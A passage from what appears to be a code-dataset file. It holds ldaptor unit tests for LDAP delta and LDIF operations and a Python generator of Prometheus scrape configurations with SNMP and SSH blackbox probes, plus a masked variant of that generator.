second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-5": "\"\"\"\nTest cases for ldaptor.protocols.ldap.delta\n\"\"\"\n\nfrom twisted.trial import unittest\nfrom ldaptor import delta, entry, attributeset, inmemory\nfrom ldaptor.protocols.ldap import ldapsyntax, distinguishedname, ldaperrors\n\n\nclass TestModifications(unittest.TestCase):\n def setUp(self):\n self.foo = ldapsyntax.LDAPEntry(\n None,\n dn=\"cn=foo,dc=example,dc=com\",\n attributes={\n \"objectClass\": [\"person\"],\n \"cn\": [\"foo\", \"thud\"],\n \"sn\": [\"bar\"],\n \"more\": [\"junk\"],\n },\n )\n\n def testAddOld(self):\n mod = delta.Add(\"cn\", [\"quux\"])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"cn\"], [\"foo\", \"thud\", \"quux\"])\n\n def testAddNew(self):\n mod = delta.Add(\"stuff\", [\"val1\", \"val2\"])\n mod.patch(self.foo)\n\n self.assertEqual(self.foo[\"stuff\"], [\"val1\", \"val2\"])\n self.assertEqual(self.foo[\"cn\"], [\"foo\", \"thud\"])\n\n def testDelete(self):\n mod = delta.Delete(\"cn\", [\"thud\"])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"cn\"], [\"foo\"])\n\n def testDeleteAll(self):\n mod = delta.Delete(\"more\")\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"cn\"], [\"foo\", \"thud\"])\n\n def testDelete_FailOnNonExistingAttributeType_All(self):\n mod = delta.Delete(\"notexist\", [])\n self.assertRaises(KeyError, mod.patch, self.foo)\n\n def testDelete_FailOnNonExistingAttributeType_OneValue(self):\n mod = delta.Delete(\"notexist\", [\"a\"])\n self.assertRaises(KeyError, mod.patch, self.foo)\n\n def testDelete_FailOnNonExistingAttributeValue(self):\n mod = delta.Delete(\"cn\", [\"notexist\"])\n self.assertRaises(LookupError, mod.patch, self.foo)\n\n def testReplace_Add(self):\n mod = delta.Replace(\"stuff\", [\"val1\", \"val2\"])\n mod.patch(self.foo)\n\n self.assertEqual(self.foo[\"stuff\"], [\"val1\", \"val2\"])\n self.assertEqual(self.foo[\"sn\"], [\"bar\"])\n self.assertEqual(self.foo[\"more\"], [\"junk\"])\n\n def testReplace_Modify(self):\n mod = delta.Replace(\"sn\", [\"baz\"])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"sn\"], [\"baz\"])\n self.assertEqual(self.foo[\"more\"], [\"junk\"])\n\n def testReplace_Delete_Existing(self):\n mod = delta.Replace(\"more\", [])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"sn\"], [\"bar\"])\n self.assertFalse(\"more\" in self.foo)\n\n def testReplace_Delete_NonExisting(self):\n mod = delta.Replace(\"nonExisting\", [])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"sn\"], [\"bar\"])\n self.assertEqual(self.foo[\"more\"], [\"junk\"])\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n def testAdd(self):\n m = delta.Add(\"foo\", [\"bar\", \"baz\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nadd: foo\nfoo: bar\nfoo: baz\n-\n\"\"\",\n )\n\n def testDelete(self):\n m = delta.Delete(\"foo\", [\"bar\", \"baz\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\ndelete: foo\nfoo: bar\nfoo: baz\n-\n\"\"\",\n )\n\n def testDeleteAll(self):\n m = delta.Delete(\"foo\")\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\ndelete: foo\n-\n\"\"\",\n )\n\n def testReplace(self):\n m = delta.Replace(\"foo\", [\"bar\", \"baz\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nreplace: foo\nfoo: bar\nfoo: baz\n-\n\"\"\",\n )\n\n def testReplaceAll(self):\n m = delta.Replace(\"thud\")\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nreplace: thud\n-\n\"\"\",\n )\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add(\"attr\", [\":value1\", \"value\\n\\r2\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nadd: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n\"\"\",\n )\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(\n dn=distinguishedname.DistinguishedName(\"dc=example,dc=com\")\n )\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(\n entry.BaseLDAPEntry(\n dn=\"dc=example,dc=com\",\n attributes={\n \"foo\": [\"bar\", \"baz\"],\n \"quux\": [\"thud\"],\n },\n )\n )\n\n result = sut.asLDIF()\n\n self.assertEqual(\n b\"\"\"dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n\"\"\",\n result,\n )\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=First Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=First Team, dc=example,dc=com\",\n attributes={\"foo\": [\"other\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n sut = delta.AddOp(team_entry)\n\n self.assertNotEqual(sut, {\"foo\": [\"same\", \"attributes\"]})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"one\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"other\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(\n rdn=\"ou=Existing Team\",\n attributes={\n \"objectClass\": [\"a\", \"b\"],\n \"ou\": [\"HR\"],\n },\n )\n\n hr_entry = entry.BaseLDAPEntry(\n dn=\"ou=Existing Team, dc=example,dc=com\",\n attributes={\"foo\": [\"dont\", \"care\"]},\n )\n sut = delta.AddOp(hr_entry)\n\n deferred = sut.patch(root)\n\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(\n entry.BaseLDAPEntry(\n dn=\"dc=example,dc=com\",\n attributes={\n \"bar\": [\"foo\"],\n \"foo\": [\"bar\"],\n },\n )\n )\n\n self.assertEqual(\n repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', \"\n \"{'bar': ['foo'], 'foo': ['bar']}))\",\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp(\"dc=example,dc=com\")\n\n result = sut.asLDIF()\n self.assertEqual(\n b\"\"\"dn: dc=example,dc=com\nchangetype: delete\n\n\"\"\",\n result,\n )\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(\n stringValue=\"ou=Team,dc=example,dc=com\"\n )\n first = delta.DeleteOp(first_dn)\n\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example, dc=com\")\n second = delta.DeleteOp(second_entry)\n\n third = delta.DeleteOp(\"ou=Team, dc=example,dc=com\")\n\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Cowboys, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n\n sut = delta.DeleteOp(team_entry)\n\n self.assertNotEqual(sut, \"ou=Team, dc=example,dc=com\")\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Cowboys, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp(\"cn=nope,dc=example,dc=com\")\n\n deferred = sut.patch(root)\n\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp(\"dc=example,dc=com\")\n\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp(\n \"cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com\",\n [\n delta.Add(\n \"postaladdress\",\n [\"123 Anystreet $ Sunnyvale, CA $ 94086\"],\n ),\n delta.Delete(\"description\"),\n delta.Replace(\n \"telephonenumber\",\n [\"+1 408 555 1234\", \"+1 408 555 5678\"],\n ),\n delta.Delete(\"facsimiletelephonenumber\", [\"+1 408 555 9876\"]),\n ],\n )\n\n result = sut.asLDIF()\n\n self.assertEqual(\n b\"\"\"dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n\"\"\",\n result,\n )\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n second = delta.ModifyOp(\n \"cn=doe,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp(\"cn=john,dc=example,dc=com\", [delta.Add(\"description\")])\n\n second = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp(\"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")])\n\n self.assertNotEqual(\"cn=john,dc=example,dc=com\", sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n second = delta.ModifyOp(\n \"cn=doe,dc=example,dc=com\", [delta.Delete(\"homeDirectory\")]\n )\n\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n second = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n self.assertEqual(first, second)\n self.assertEqual(\n first.asLDIF(),\n second.asLDIF(),\n \"LDIF equality is a precondition for valid hash values\",\n )\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n second = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"homeDirectory\")]\n )\n\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp(\n \"cn=nope,dc=example,dc=com\",\n [delta.Add(\"foo\", [\"bar\"])],\n )\n\n deferred = sut.patch(root)\n\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp(\"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")])\n\n self.assertEqual(\n repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', \"\n \"modifications=[Delete('description', [])])\",\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n def testEquality_Add_True(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = delta.Delete(\"k\", [\"b\", \"c\", \"d\"])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = attributeset.LDAPAttributeSet(\"k\", [\"b\", \"c\", \"d\"])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = [\"b\", \"c\", \"d\"]\n self.assertNotEqual(a, b)\n",
"step-ids": [
43,
46,
52,
54,
63
]
}
|
[
43,
46,
52,
54,
63
] |
# Copyright 2018 dhtech
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file
import lib
import urlparse
import yaml
MANIFEST_PATH = '/etc/manifest'
HTTP_BASIC_AUTH = None
def blackbox(name, backend, targets, params,
target='target', path='/probe', labels=None):
labels = {} if labels is None else labels
# Strip banned OSes
banned_oses = ['debian']
filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]
return {
'job_name': name,
'metrics_path': path,
'params': params,
'static_configs': [{
'targets': sorted(filtered_targets),
'labels': labels
}],
'relabel_configs': [{
'source_labels': ['__address__'],
'regex': '(.*)(:80)?',
'target_label': '__param_%s' % target,
'replacement': '${1}',
}, {
'source_labels': ['__param_%s' % target],
'regex': '(.*)',
'target_label': 'instance',
'replacement': '${1}',
}, {
'source_labels': [],
'regex': '.*',
'target_label': '__address__',
'replacement': backend,
}]
}
def generate_backend(host, local_services):
scrape_configs = []
scrape_configs.extend(local_services)
domain = lib.get_domain(host)
basic_auth = lib.read_secret('services/monitoring:login')
# Find services that wants to be monitored
manifest = yaml.load(file(MANIFEST_PATH).read())
for package, spec in manifest['packages'].iteritems():
if spec is None or 'monitor' not in spec:
continue
urls = (spec['monitor']['url']
if isinstance(spec['monitor']['url'], dict) else
{None: spec['monitor']['url']})
for url_id, url_str in urls.iteritems():
url = urlparse.urlparse(url_str)
targets = []
for target in sorted(
lib.get_nodes_with_package(package, domain).keys()):
targets.append(target if url.port is None else '%s:%d' % (
target, url.port))
scrape_config = {
'job_name': package + ('-%s' % url_id if url_id else ''),
'metrics_path': url.path,
'scheme': url.scheme,
'static_configs': [
{'targets': sorted(targets)}
],
}
if 'interval' in spec['monitor']:
scrape_config['scrape_interval'] = spec['monitor']['interval']
if 'labels' in spec['monitor']:
scrape_config['static_configs'][0]['labels'] = spec['monitor']['labels']
# Only allow authentication over https
if spec['monitor'].get('auth', False) and url.scheme == 'https':
scrape_config['basic_auth'] = basic_auth
scrape_configs.append(scrape_config)
# Layer specific monitoring
layers = lib.get_layers(domain)
snmp_nodes = {}
ssh_nodes = {}
for layer in layers:
hosts = lib.get_nodes_with_layer(layer, domain)
snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')
ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')
snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))
ssh_nodes[layer] = [x+':22' for x in set(hosts) - set(ssh_mute)]
# SNMP
for layer in layers:
# TODO(bluecmd): Use options for this
if layer == 'access':
snmp_host = 'snmp2.event.dreamhack.se'
else:
snmp_host = 'snmp1.event.dreamhack.se'
snmp = blackbox(
'snmp_%s' % layer, snmp_host,
snmp_nodes[layer], {'layer': [layer]}, labels={
'layer': layer})
snmp['scrape_interval'] = '30s'
snmp['scrape_timeout'] = '30s'
scrape_configs.append(snmp)
# SSH
for layer in layers:
for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:
fqdn = ssh_host + '.event.dreamhack.se:9115'
ssh = blackbox(
'ssh_%s_%s' % (layer, ssh_host), fqdn,
ssh_nodes[layer], {'module': ['ssh_banner']}, labels={'layer': layer})
ssh['scrape_interval'] = '30s'
ssh['scrape_timeout'] = '30s'
scrape_configs.append(ssh)
# Add external service-discovery
external = {
'job_name': 'external',
'file_sd_configs': [{
'files': ['/etc/prometheus/external/*.yaml'],
}],
}
scrape_configs.append(external)
if host.endswith('.event.dreamhack.se'):
# Event should scrape puppet.tech.dreamhack.se to get information about
# puppet runs
puppet = {
'job_name': 'puppet_runs',
'metrics_path': '/metrics',
'scrape_interval': '60s',
'scrape_timeout': '55s',
'static_configs': [{
'targets': ['puppet.tech.dreamhack.se:9100'],
}],
}
scrape_configs.append(puppet)
vcenter = {
'job_name': 'vmware_vcenter',
'metrics_path': '/metrics',
'scrape_interval': '60s',
'scrape_timeout': '55s',
'static_configs': [{
'targets': ['provision.event.dreamhack.se:9272'],
}],
}
scrape_configs.append(vcenter)
# Make sure that all metrics have a host label.
# This rule uses the existing host label if there is one,
# stripping of the port (which shouldn't be part of the host label anyway)
# *or* if that label does not exist it uses the instance label
# (again stripping of the port)
relabel = {
'regex': r':?([^:]*):?.*',
'separator': ':',
'replacement': '${1}',
'source_labels': ['host', 'instance'],
'target_label': 'host',
}
mrc = 'metric_relabel_configs'
for scrape in scrape_configs:
if mrc in scrape:
scrape[mrc].append(relabel)
else:
scrape[mrc] = [relabel]
return {'scrape_configs': scrape_configs}
def requires(host, *args):
return ['apache(ldap)']
def generate(host, *args):
info = {}
local_targets = []
local_targets.append({
'job_name': 'prometheus',
'scheme': 'http',
'static_configs': [{'targets': ['localhost:9090']}]})
info['prometheus'] = generate_backend(host, local_targets)
# Get current event
info['prometheus']['current_event'] = lib.get_current_event()
return info
# vim: ts=4: sts=4: sw=4: expandtab
|
normal
|
{
"blob_id": "f489058c922d405754ad32a737f67bc03c08772b",
"index": 701,
"step-1": "<mask token>\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\n<mask token>\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
